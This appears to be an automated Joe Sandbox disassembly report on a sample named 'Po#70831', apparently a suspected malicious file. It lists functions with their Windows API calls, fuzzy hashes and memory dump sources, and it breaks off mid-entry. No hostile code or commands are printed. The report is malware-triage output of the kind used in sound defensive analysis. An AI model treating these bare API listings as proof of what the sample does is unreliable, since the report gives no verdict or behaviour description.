                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 1120388591-0
                                      • Opcode ID: 2e5ba058c5a2263a6f7b87d0037c7405f0c1e777cd1acc77800168f2c26f7d24
                                      • Instruction ID: 0e146a9e405e98bf23af8f56c57c5e74845ef0ca2df4fe4acd9ff26f5c7b19d1
                                      • Opcode Fuzzy Hash: 2e5ba058c5a2263a6f7b87d0037c7405f0c1e777cd1acc77800168f2c26f7d24
                                      • Instruction Fuzzy Hash: CA817E70208241AFE714DF24C885E6ABFE5FF85308F14896DF4554B2A2DB31ED85CB92
                                      Function 004EF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000035), ref: 004EF7B9
                                      • SysAllocString.OLEAUT32(00000001), ref: 004EF860
                                      • VariantCopy.OLEAUT32(004EFA64,00000000), ref: 004EF889
                                      • VariantClear.OLEAUT32(004EFA64), ref: 004EF8AD
                                      • VariantCopy.OLEAUT32(004EFA64,00000000), ref: 004EF8B1
                                      • VariantClear.OLEAUT32(?), ref: 004EF8BB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCopy$AllocInitString
                                      • String ID:
                                      • API String ID: 3859894641-0
                                      • Opcode ID: ad16d7f40813a0c230d630fc1bd10b0bac842dab27d641cf9a9766f9768f67d0
                                      • Instruction ID: ea88011922109a5d4bb0dbc0b7c8f41bcf8fb0f84d0edf12ec6e55bcec6d4cd6
                                      • Opcode Fuzzy Hash: ad16d7f40813a0c230d630fc1bd10b0bac842dab27d641cf9a9766f9768f67d0
                                      • Instruction Fuzzy Hash: 36510871500340BADF20AB67D895B29B7A4EF45316B20446BE846DF292D7788C49C79F
                                      Function 0050910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 005094E5
                                      • _wcslen.LIBCMT ref: 00509506
                                      • _wcslen.LIBCMT ref: 0050952D
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00509585
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName$OpenSave
                                      • String ID: X
                                      • API String ID: 83654149-3081909835
                                      • Opcode ID: 4d1edcfd1e1dc643ab7cbb0da650bc5a1b00f0a3f8cf498e7219a8153077f4eb
                                      • Instruction ID: fdc3a361bbae319b700bc42c8f866cbddc853739b5d9a0e3f681639304a94b57
                                      • Opcode Fuzzy Hash: 4d1edcfd1e1dc643ab7cbb0da650bc5a1b00f0a3f8cf498e7219a8153077f4eb
                                      • Instruction Fuzzy Hash: 29E1A271508301DFCB24DF25C881A6EBBE0BF85318F14896DF8999B2A2DB35DD05CB96
                                      Function 004A920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • BeginPaint.USER32(?,?,?), ref: 004A9241
                                      • GetWindowRect.USER32(?,?), ref: 004A92A5
                                      • ScreenToClient.USER32(?,?), ref: 004A92C2
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004A92D3
                                      • EndPaint.USER32(?,?,?,?,?), ref: 004A9321
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004E71EA
                                        • Part of subcall function 004A9339: BeginPath.GDI32(00000000), ref: 004A9357
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 3050599898-0
                                      • Opcode ID: b33f02266297d329a459c07d59b7d6bf46fd2731ad6f334dabd9fdce521205bd
                                      • Instruction ID: a0b34a02b8f096a792e3aae0235630538a70e28d5ccc94d4bdaa2f4b20561aab
                                      • Opcode Fuzzy Hash: b33f02266297d329a459c07d59b7d6bf46fd2731ad6f334dabd9fdce521205bd
                                      • Instruction Fuzzy Hash: 4C41B331104300AFD720DF15C885FBB7BB8EF6A325F14065AF954872A1C7749C4ADB66
                                      Function 005007EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0050080C
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00500847
                                      • EnterCriticalSection.KERNEL32(?), ref: 00500863
                                      • LeaveCriticalSection.KERNEL32(?), ref: 005008DC
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005008F3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00500921
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                      • String ID:
                                      • API String ID: 3368777196-0
                                      • Opcode ID: 6f94fcacc080df29d0ae38999999002bf9b467d9f38a9c94e59ceba22c33d558
                                      • Instruction ID: fc07bf61979f238cdb0bfd9db3a9a573b201c6f07f86e220afa2214955a24e35
                                      • Opcode Fuzzy Hash: 6f94fcacc080df29d0ae38999999002bf9b467d9f38a9c94e59ceba22c33d558
                                      • Instruction Fuzzy Hash: 7E418D31900205EFDF149F94DC85AAE7BB8FF15304F1480A9ED009A297DB34DE65DBA4
                                      Function 005281DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004EF3AB,00000000,?,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 0052824C
                                      • EnableWindow.USER32(00000000,00000000), ref: 00528272
                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 005282D1
                                      • ShowWindow.USER32(00000000,00000004), ref: 005282E5
                                      • EnableWindow.USER32(00000000,00000001), ref: 0052830B
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0052832F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: ce669d03f3333e14c245e0e24f4826de86fe499c0012ea8ddf7c764504e34142
                                      • Instruction ID: 06b9a5270b26a724bb31a07b13e39c7573e36bcb5fb6c87cddda23aac4127f6a
                                      • Opcode Fuzzy Hash: ce669d03f3333e14c245e0e24f4826de86fe499c0012ea8ddf7c764504e34142
                                      • Instruction Fuzzy Hash: D9418F34602A54EFDB21CF58E899BB47FE0BF5BB14F184169E5084F2A2CB71A845DF50
                                      Function 004F4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 004F4C95
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004F4CB2
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004F4CEA
                                      • _wcslen.LIBCMT ref: 004F4D08
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004F4D10
                                      • _wcsstr.LIBVCRUNTIME ref: 004F4D1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                      • String ID:
                                      • API String ID: 72514467-0
                                      • Opcode ID: 0b4af5273aaa861a03e96b1fe65e120b61c0246054c9b1f8c40278a23b77440b
                                      • Instruction ID: a2d04732e352be42b244b2d05210ece9082f2c623dd768e80a1c3e122e4ac061
                                      • Opcode Fuzzy Hash: 0b4af5273aaa861a03e96b1fe65e120b61c0246054c9b1f8c40278a23b77440b
                                      • Instruction Fuzzy Hash: BC2129312042447BFB255B7AAC49E7F7F9CDF96750F10402FF905CA292DE69DC0192A4
                                      Function 0050581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                      • _wcslen.LIBCMT ref: 0050587B
                                      • CoInitialize.OLE32(00000000), ref: 00505995
                                      • CoCreateInstance.OLE32(0052FCF8,00000000,00000001,0052FB68,?), ref: 005059AE
                                      • CoUninitialize.OLE32 ref: 005059CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 3172280962-24824748
                                      • Opcode ID: 76978745193ab2c0f0711d0489a9be12ee671781a10530676d863f0c7813a17b
                                      • Instruction ID: efa1cc2571f57df8d2abf1847410418286f5129dee79e11e96282190c5db0101
                                      • Opcode Fuzzy Hash: 76978745193ab2c0f0711d0489a9be12ee671781a10530676d863f0c7813a17b
                                      • Instruction Fuzzy Hash: 3AD133716086019FCB14DF25C48492EBBE5FF89714F15886EF88A9B2A1E731EC45CF92
                                      Function 004F175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F0FCA
                                        • Part of subcall function 004F0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F0FD6
                                        • Part of subcall function 004F0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F0FE5
                                        • Part of subcall function 004F0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F0FEC
                                        • Part of subcall function 004F0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F1002
                                      • GetLengthSid.ADVAPI32(?,00000000,004F1335), ref: 004F17AE
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004F17BA
                                      • HeapAlloc.KERNEL32(00000000), ref: 004F17C1
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 004F17DA
                                      • GetProcessHeap.KERNEL32(00000000,00000000,004F1335), ref: 004F17EE
                                      • HeapFree.KERNEL32(00000000), ref: 004F17F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: fdb4716989e08caa1f0a015d806eb362d164e3ea5d324b1d1bdce8f4ba218864
                                      • Instruction ID: a417d596e1e1ec7c1e4f4d1c86d55bb30b0a1257c11b353f6901b5632d2b820e
                                      • Opcode Fuzzy Hash: fdb4716989e08caa1f0a015d806eb362d164e3ea5d324b1d1bdce8f4ba218864
                                      • Instruction Fuzzy Hash: 5A11BE31900209FFDB20AFA4CC8ABBFBBE9EF42355F10401AF54597221C739A949DB64
                                      Function 004F14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004F14FF
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004F1506
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004F1515
                                      • CloseHandle.KERNEL32(00000004), ref: 004F1520
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004F154F
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 004F1563
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: fb111a751c2884275ea42cbf10b0e168d599a82f65abbb9c1e06f05c4654608a
                                      • Instruction ID: 08248a65cc2b5fa6d385dc1caaae07e23dafb9fd21e56eafe6aec92f1e1a02f4
                                      • Opcode Fuzzy Hash: fb111a751c2884275ea42cbf10b0e168d599a82f65abbb9c1e06f05c4654608a
                                      • Instruction Fuzzy Hash: D811597250020DEBDF21CF98DE49BEE7BA9EF49744F144019FA05A2160C3758E65EB64
                                      Function 004B3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,004B3379,004B2FE5), ref: 004B3390
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004B339E
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004B33B7
                                      • SetLastError.KERNEL32(00000000,?,004B3379,004B2FE5), ref: 004B3409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 7f35532b587b7dd2a9db3c2344ff568311795791d24ce4504fe4fe73e028eb4d
                                      • Instruction ID: 5479d2969c38db278c12160d5d1b408f5caeb820670a4325dbdb77abecec70fa
                                      • Opcode Fuzzy Hash: 7f35532b587b7dd2a9db3c2344ff568311795791d24ce4504fe4fe73e028eb4d
                                      • Instruction Fuzzy Hash: 6E012D32208311BEA6242FB7BC956DB2F94DB2577B720022FF811812F1EF595D06A17C
                                      Function 004C2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,004C5686,004D3CD6,?,00000000,?,004C5B6A,?,?,?,?,?,004BE6D1,?,00558A48), ref: 004C2D78
                                      • _free.LIBCMT ref: 004C2DAB
                                      • _free.LIBCMT ref: 004C2DD3
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,004BE6D1,?,00558A48,00000010,00494F4A,?,?,00000000,004D3CD6), ref: 004C2DE0
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,004BE6D1,?,00558A48,00000010,00494F4A,?,?,00000000,004D3CD6), ref: 004C2DEC
                                      • _abort.LIBCMT ref: 004C2DF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: ccf4b70cb07a77946c6c49e1092c78bb012432ddfb2bd319f7ff37167950ecf9
                                      • Instruction ID: b36d7f818899ca190cf0da4d0c9f9922a029c91fa8a0ab48f60d5cbdd1f0e16b
                                      • Opcode Fuzzy Hash: ccf4b70cb07a77946c6c49e1092c78bb012432ddfb2bd319f7ff37167950ecf9
                                      • Instruction Fuzzy Hash: 23F0493D500B0027C6E237356E06F1F19596FF2365F20081FF425922D2EEEC88065128
                                      Function 00528A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A9693
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96A2
                                        • Part of subcall function 004A9639: BeginPath.GDI32(?), ref: 004A96B9
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96E2
                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00528A4E
                                      • LineTo.GDI32(?,00000003,00000000), ref: 00528A62
                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00528A70
                                      • LineTo.GDI32(?,00000000,00000003), ref: 00528A80
                                      • EndPath.GDI32(?), ref: 00528A90
                                      • StrokePath.GDI32(?), ref: 00528AA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 602f2ac19a05f78cf218b74978b69b9069c10f92e13400ecc3cc6a73477f9493
                                      • Instruction ID: a34f2fb390526392448a2d1f57d0bb4b4a9e13065f45e74e002eb6eaf4ce6510
                                      • Opcode Fuzzy Hash: 602f2ac19a05f78cf218b74978b69b9069c10f92e13400ecc3cc6a73477f9493
                                      • Instruction Fuzzy Hash: 78110C76000118FFEF129F94DC88EAE7F6CEF19354F048052FA15961A1C7719D59EBA0
                                      Function 004F51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004F5218
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 004F5229
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004F5230
